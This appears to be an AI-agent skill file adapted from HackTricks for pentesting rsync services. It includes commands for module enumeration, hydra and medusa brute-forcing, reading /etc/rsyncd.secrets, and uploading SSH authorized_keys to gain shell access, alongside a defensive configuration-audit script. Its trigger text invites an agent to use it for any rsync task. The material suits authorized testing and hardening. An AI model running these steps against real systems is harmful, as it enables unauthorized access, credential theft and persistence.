Hacktricks-skills rsync-pentest

Pentest rsync file sharing services on port 873. Use this skill whenever you need to enumerate, access, or exploit rsync services. Trigger this skill for any rsync-related tasks including module enumeration, authentication testing, file transfer, brute force attacks, or post-exploitation configuration analysis. Make sure to use this skill when you see port 873 open, need to test rsync shares, or want to transfer files via rsync.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/873-pentesting-rsync/SKILL.MD
source content

Rsync Pentesting Skill

A skill for pentesting rsync file sharing services (default port 873).

Quick Start

# Enumerate rsync modules
nmap -sV --script "rsync-list-modules" -p 873 <TARGET_IP>

# Manual enumeration via netcat
nc -vn <TARGET_IP> 873

Enumeration

Banner Grabbing

Connect to the rsync service to get version information:

nc -vn <TARGET_IP> 873

The server responds with @RSYNCD: <version>. Send the same version back, then request #list to retrieve available modules.

Example interaction:

@RSYNCD: 31.0        # Server sends version
@RSYNCD: 31.0        # You send same version back
#list                # Request module list
raidroot             # Module 1
USBCopy              # Module 2
_NAS_Recycle_TOSRAID # Module 3
@RSYNCD: EXIT        # Server closes connection

Module Enumeration

Use these methods to discover available rsync modules:

# Using nmap
nmap -sV --script "rsync-list-modules" -p 873 <TARGET_IP>

# Using rsync directly
rsync -av --list-only rsync://<TARGET_IP>:873

# IPv6 with alternate port
rsync -av --list-only rsync://[<IPv6>]:8730

# Metasploit module
msf> use auxiliary/scanner/rsync/modules_list

Testing Authentication

Check if modules require authentication:

# Try accessing a module
rsync -av --list-only rsync://<TARGET_IP>/<module_name>

If authentication is required, you'll see:

@RSYNCD: AUTHREQD <token>

Accessing Shared Modules

Without Authentication

# List contents
rsync -av --list-only rsync://<TARGET_IP>/<module_name>

# Download files (recursive, preserves attributes)
rsync -av rsync://<TARGET_IP>/<module_name> ./local_dir/

# Download with alternate port
rsync -av rsync://<TARGET_IP>:8730/<module_name> ./local_dir/

With Authentication

# List with credentials (prompts for password)
rsync -av --list-only rsync://<username>@<TARGET_IP>/<module_name>

# Download with credentials
rsync -av rsync://<username>@<TARGET_IP>/<module_name> ./local_dir/

Uploading Files

# Upload to remote module
rsync -av ./local_file rsync://<username>@<TARGET_IP>/<module_name>/

# Upload SSH authorized_keys for access
rsync -av home_user/.ssh/ rsync://<username>@<TARGET_IP>/home_user/.ssh

Brute Force Attacks

If modules require authentication, attempt credential cracking:

# Using hydra
hydra -l <username> -P /path/to/wordlist <TARGET_IP> rsync

# Using medusa
medusa -h <TARGET_IP> -u <username> -P /path/to/wordlist -M rsync

Post-Exploitation

Finding Configuration Files

Once you have system access, locate rsync configuration:

# Find rsyncd configuration
find /etc -name "rsyncd.conf" -o -name "rsyncd.secrets"

# Check for credentials in secrets file
cat /etc/rsyncd.secrets

The secrets file contains usernames and passwords for rsyncd authentication.

Common Configuration Locations

  • /etc/rsyncd.conf - Main configuration file
  • /etc/rsyncd.secrets - Authentication credentials
  • /etc/rsyncd.chroot - Chroot settings
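
An added example (not part of the original skill or its upstream source): a defender-side audit of rsyncd.conf text that flags the settings the attack patterns on this page depend on, namely modules with no auth users, writable modules, modules reachable from any host, and disabled chroot. The sample configuration and the tag names are constructed for illustration; lower-casing parameter names is an assumption, and backslash line continuations are not handled.

```python
import re
# Constructed sample config, not taken from any real host.
SAMPLE_CONF = """\
hosts allow = 10.0.0.0/8
[backups]
    path = /srv/backups
    # no "auth users": anyone permitted by hosts allow can read
[home_user]
    path = /home/user
    read only = no
    hosts allow = *
[private]
    path = /srv/private
    auth users = alice
    secrets file = /etc/rsyncd.secrets
"""

FALSE = {"no", "false", "0"}  # boolean "off" spellings accepted by rsyncd.conf

def parse(text):
    """Return (globals, {module: params}); whitespace in parameter names is dropped."""
    glob, modules, cur = {}, {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            cur = modules.setdefault(m.group(1).strip(), {})
        elif "=" in line:
            key, val = line.split("=", 1)          # only the first "=" is significant
            key = "".join(key.lower().split())     # "auth users" -> "authusers"
            (glob if cur is None else cur)[key] = val.strip()
    return glob, modules

def audit(text):
    """Map each module to a list of tags; an empty list means none of these checks fired."""
    glob, modules = parse(text)
    report = {}
    for name, params in modules.items():
        eff = {**glob, **params}                   # module settings override globals
        checks = [
            ("anonymous", not eff.get("authusers", "").strip()),
            ("writable", eff.get("readonly", "yes").lower() in FALSE),   # default: yes
            ("any-host", eff.get("hostsallow", "*").strip() in ("", "*")),
            ("no-chroot", eff.get("usechroot", "yes").lower() in FALSE),  # default: yes
        ]
        report[name] = [tag for tag, hit in checks if hit]
    return report
if __name__ == "__main__":
    print(audit(SAMPLE_CONF))
```

A module tagged both anonymous and writable is the precondition for Pattern 3 and should be fixed first.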

Attack Patterns

Pattern 1: Anonymous Access Discovery

  1. Enumerate modules with nmap -sV --script "rsync-list-modules"
  2. Test each module for anonymous access
  3. Download accessible files
  4. Look for sensitive data, credentials, or backup files

Pattern 2: Credential Harvesting

  1. Find modules requiring authentication
  2. Attempt brute force with common credentials
  3. Use discovered credentials to access other services
  4. Check for password reuse across systems

Pattern 3: SSH Key Upload

  1. Find writable rsync module
  2. Upload authorized_keys file
  3. Gain SSH access to the system

Tips

  • Some modules may be hidden and not appear in the list
  • "Access Denied" messages indicate credential requirements
  • Use rsync -av for recursive transfers with attribute preservation
  • Consider using SSH tunneling for encrypted rsync transfers
  • Check for path traversal vulnerabilities in module configurations
